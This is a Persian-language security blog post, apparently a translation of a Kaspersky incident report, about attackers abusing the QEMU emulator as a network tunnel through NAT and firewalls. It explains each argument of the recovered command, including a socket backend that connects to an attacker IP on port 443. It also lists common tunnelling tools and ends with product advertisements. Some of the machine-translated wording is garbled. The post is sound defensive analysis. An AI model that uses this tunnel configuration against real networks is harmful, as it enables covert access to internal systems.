تونل‌زنی شبکه‌ای با QEMU

20 اسفند 1402 تونل‌زنی شبکه‌ای با QEMU

روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛ مهاجمین سایبری موقع اجرای حملات مختلف دوست دارند اولویت را برای ابزار قانونی بگذارند زیرا این ابزارها به آن‌ها کمک می‌کنند همچنان که هزینه‌های توسعه بدافزار را به حداقل می‌رسانند، سیستم‌های شناسایی را نیز دور بزنند. اسکن شبکه، گرفتن حافظه فرآیند، استخراج داده، اجرای ریموت فایل‌ها و حتی رمزگذاری درایوها- همگی اینها می‌توانند با نرم‌افزاری قابل اعتماد انجام شوند. برای سفت کردن جای پا داخل زیرساختی دستکاری‌شده و پیشبرد حمله، مهاجمین می‌توانند از بدافزارهای از پیش نصب‌شده استفاده کرده یا در کنار کارمندان از طریق سرورهای RDP یا وی‌پی‌ان سازمانی (برای انجام این کار مهاجمین باید اکانت‌هایی با مزیت‌های مناسب داشته باشند) خود را در شبکه جا کنند. روش دیگر برای اتصال به شبکه داخلی سازمانی مورد حمله واقع‌شده شامل استفاده از ابزارهای می‌شود برای راه‌اندازی تونل‌های شبکه یا پورت‌های شبکه بین سیستم‌های سازمانی و سرورهای مهاجم که همین به آن‌ها اجازه می‌دهد NAT و فایروال‌های را برای دسترسی به سیستم‌های داخلی دور بزنند. این دسته‌بندی نرم‌افزاری است که قرار است در این مقاله بدان بپردازیم. با ما همراه باشید.

آمار

در حال حاضر هیچ کمبودی در ابزارهایی که بتوان از آنها برای راه اندازی یک تونل شبکه بین دو سیستم استفاده کرد وجود ندارد. برخی از اینها مستقیماً متصل می‌شوند، در حالیکه برخی دیگر از پروکسی استفاده می‌کنند که آدرس IP سرور مهاجم را پنهان می‌کند. موارد زیر ابزارهایی هستند که در سه سال گذشته هنگام پاسخگویی به رخدادهای سایبری با آنها مواجه شده‌ایم.

راهرو

لیگولو

3 پروکسی

سگ تونل

اسکنه

FRP

ngrok

gs-netcat

PLINK

iox

nps

متداول‌ترین آنها ngrok و FRP بودند. برنامه‌های کاربردی از این نوع 10 درصد از کل حملات را تشکیل می‌دهند.

QEMU به عنوان یک ابزار تونل زنی

موقع بررسی رخداد سایبری در یک شرکت بزرگ، فعالیت مخرب غیرمعمولی را در داخل یکی از سیستم‌ها شناسایی کردیم. با تجزیه و تحلیل انجام‌شده متوجه شدیم که دشمن موارد زیر را مستقر و راه اندازی کرده است:

 

  •         ابزار اسکن شبکه Angry IP Scanner
  •         رمز عبور mimikatz، هش و استخراج کننده بلیط Kerberos و ابزار حمله Active Directory
  •         شبیه ساز سخت افزار QEMU

دو مورد اول خود توضیحی بود، اما QEMU چند سوال را مطرح کرد. فاکتورهای مخرب چه استفاده ای از مجازی‌ساز خواهند داشت؟

ما توانستیم خط فرمان اجرای QEMU را از حافظه ماشین در معرض خطر بازیابی کنیم. کاشف بعمل آمد بدون LiveCD یا تصویر دیسک شروع شده است که برای QEMU بسیار غیرعادی است.

اجازه دهید نگاهی دقیق تر به این استدلال ها بیندازیم.

m 1M -: اندازه RAM را برای تخصیص به ماشین مجازی مشخص می‌کند. در این مورد 1 مگابایت بود که برای اکثر سیستم عامل‌ها کاملاً ناکافی بود.

-netdev user,id=lan,restrict=off:یک رابط شبکه مجازی با نام lan و نوع user ایجاد می‌کند که به ماشین مجازی اجازه می‌دهد از طریق پشته شبکه میزبان با دنیای خارج ارتباط برقرار کند. گزینه limited=off محدودیت های اتصالات ورودی و خروجی را حذف می کند.

-netdev socket,id=sock,connect=<IP>:443:  یک رابط شبکه از نوع سوکت با نام sock ایجاد می‌کند که اتصال به یک سرور راه دور در آدرس IP و پورت 443 مشخص شده را فراهم می‌آورد.

-netdev hubport,id=port-lan,hubid=0,netdev=lan :  پورتی را با hubid=0 به هاب مجازی اضافه می کند که به شبکه واسط شبکه مجازی lan متصل است.

-netdev hubport,id=port-sock,hubid=0,netdev=sock:مشابه موارد فوق، یک پورت دیگر به هاب مجازی متصل به جوراب رابط شبکه مجازی اضافه می‌کند.

-nographic : QEMU را در حالت غیر GUI با خروجی کنسول شروع می‌کند.

آدرس IP موجود در آرگومان‌ها بلافاصله توجه ما را به خود جلب کرد: خارجی بود و کاملاً با شرکت مورد حمله ارتباط نداشت، بنابراین ما با اسناد QEMU را مورد بررسی قرار دادیم و متوجه شدیم QEMU از اتصالات بین ماشین‌های مجازی پشتیبانی می‌کند: گزینه -netdev دستگاه‌های شبکه (بک‌اند) را ایجاد می‌کند که سپس می‌توانند به ماشین‌های مجازی متصل شوند. هر یک از دستگاه های شبکه متعدد بر اساس نوع خود تعریف می‌شود و از گزینه های اضافی پشتیبانی می‌کند. در زیر توضیحی از مقادیر -netdev استفاده شده است.

کاربر (پشته شبکه کاربر)

این ساده‌ترین راه برای اتصال ماشین مجازی به شبکه است. ترافیک از پشته شبکه میزبان عبور می‌کند و ماشین مجازی به شبکه متصل می‌شود که گویی یک برنامه معمولی در ماشین میزبان است.

هابپورت (مرکز مجازی)

چندین دستگاه شبکه را به طور مشابه به یک هاب شبکه متصل می کند.

سوکت

 ماشین‌های مجازی را مستقیماً از طریق سوکت‌های شبکه برای ایجاد توپولوژی‌های شبکه VM یا پیوند دادن ماشین‌های مجازی روی میزبان‌های مختلف متصل می‌کند.

ما هیچ روشی که بشود به طور مطمئن تعیین کرد چطور مهاجمین  QEMU را روی سرور خود نصب کردند نداشتیم و از این رو تصمیم گرفتیم تکنیکی که بالاتر شرح داده شد بستری مشتکل از سه سیستم آزمایش کنیم:

InternalHost در داخل شبکه قرار داشت، بدون دسترسی به اینترنت و یک سرور RDP روی پورت 3389 اجرا می‌کرد. این سیستم ایزوله را بدون دسترسی به اینترنت شبیه سازی می‌کرد.

PivotHost در داخل شبکه قرار داشت، اما دسترسی به اینترنت داشت. سیستمی را شبیه سازی می‌کرد که توسط مهاجمان نفوذ کرده بود و برای دسترسی به هاست داخلی استفاده می‌شد.

AttackerServer در فضای کلود میزبانی می‌شد و سرور حریف را شبیه‌سازی می‌کرد.

هدف ما دسترسی به InternalHost از AttackerServer بود.

تحلیل ترافیک شبکه QEMU

QEMU از هیچ رمزگذاری اضافی در هنگام تونل سازی ترافیک استفاده نمی‌کند. بسته‌های محصورشده را بدون رمز ارسال می‌کند: داده‌های بسته در سطح برنامه که به سرور ارسال می‌شود، شامل اندازه فریم اترنت محصور شده  به دنبال آن خود فریم اترنت می‌شود.

جمع‌بندی

سناریوی مهاجمینی که برای اجرای حملات مختلف از ابزارهای قانونی استفاده می‌کنند برای متخصصین واکنش به رخداد خبر داغ و تازه‌ای نیست؛ با این حال باید اعتراف کنیم گاهی عاملین مخرب با اپ‌های هوشمندانه‌ای اجرای حمله خود را شروع می‌کنند؛ نمونه‌اش همین  QEMU. این در ادامه مفهوم محافظت چند سطحی را پشتیبانی می‌کند، مفهومی که هم محافظت مطمئن اندپوینت را پوشش می‌دهد و هم راهکارهای تخصصی برای شناسایی و محافظت در برابر حملات پیچیده و هدف‌دار شامل آن‌هایی که به دست انسان عملیاتی می‌شوند. فقط امنیت جامعی که شامل نظارت 24 ساعت شبانه‌روز در هفت روز هفته شبکه می‌شود (NDR, NGFW) و اندپیونت (EDR, EPP) می‌توانند ناهنجاری‌ها را به طور مرتب شناسایی کرده و در مرحله اولیه حمله را خنثی کنند. سرویس MDR ما قادر به شناسایی نوع فعالیت مشکوک QEMU است و نیز در ادامه قوانین درست IDS نیز به پلت‌فرم KATA با حکم Backdoor.Agent.QEMU.C&C افزوده شده است.

 

منبع: کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.

محصولات مرتبط

  • Kaspersky Internet Security for Android

    امنیت پیشرفته‌ای که همیشه همراه شماست بخش مهمی از زندگی اکثر ما اکنون روی گوشی‌ها و تبلت‌هاست- پس به امنیت موبایلی نیاز دارید که شما را همیشه امن نگه ...

    7,028,300 ریال
    خرید
  • Kaspersky Cloud Password Manager

    Kaspersky Cloud Password Manager ابزار مدیریت کلمه عبور ابری کسپرسکی (KCPM) ضمن ذخیره ایمن تمامی کلمات عبور مورد استفاده شما برای وبسایت‌ها، اپلیکیشن‌ها، و شبکه‌های اجتماعی آنها را در تمامی ...

    10,545,800 ریال
    خرید
  • Kaspersky Safe Kids

    شما می توانید بر ارتباطات اینترنتی کودکان از قبیل فعالیتهای عمومی در فیسبوک، کنترل تماسها و پیامها از طریق دستگاههای اندرویدی نظارت داشته باشید. کمک شما به کودکان بهترین راهنمایی برای آنها ...

    10,545,800 ریال
    خرید
  • Kaspersky Small Office Security

    محافظت در حین کار Kaspersky Small Office Security به طور خاص برای سازمان‌هایی طراحی شده است که 5 تا 50 دستگاه کامپیوتر در خود جای داده‌اند. نصب آن بسیار آسان است؛ مدیریت آن ...

    25,326,000 ریال
    خرید
  • Kaspersky Security Cloud Personal

    تمام اپ‌های امنیتیِ ما در دستانتان. به کل خانواده‌ی اپ‌های ما برای دسکتاپ و موبایل دسترسی پیدا کنید. از آنتی‌ویروس گرفته تا ابزارهای حریم خصوصی و اجرایی، هر کدام را به میل ...

    70,343,300 ریال
    خرید
  • Kaspersky Standard

    سیستم امنیتی بهبودیافته به همراه تقویت‌کننده عمکرد دستگاه طرح امنیتی استاندارد ما، نه تنها سیستم امنیتی قدرتمندی را برای انواع ویروس‌ها، بدفزارها و باج‌افزارها ارائه می‌دهد ...

    19,899,000 ریال
    خرید
  • Kaspersky Plus

    امنیت. کارایی. حریم خصوصی. همه در یک برنامه با کاربری آسان کسپرسکی پلاس با ارائه امنیت سایبری نسل بعد، شما در برابر ویروس‌ها، باج‌افزارها و بدافزارهای جدید محافظت کند - بدون ...

    28,535,300 ریال
    خرید
  • Kaspersky Premium

    حفاظت کامل از دستگاه ها، حریم خصوصی و هویت شما با محصول Kaspersky Premium تمام نیازهای امنیتی خود و خانواده‌تان را پوشش دهید. حفاظت پیشرفته ...

    30,525,200 ریال
    خرید

نظر خودتان را ارسال کنید


کاربر گرامی چنانچه تمایل دارید، نقد یا نظر شما به نام خودتان در سایت ثبت شود، لطفاً وارد سایت شوید.
*نظر
کلیه حقوق مادی و معنوی این سایت محفوظ و متعلق به شرکت گسترش خدمات تجارت الکترونیک ایرانیان است و هر گونه کپی برداری از آن پیگرد قانونی دارد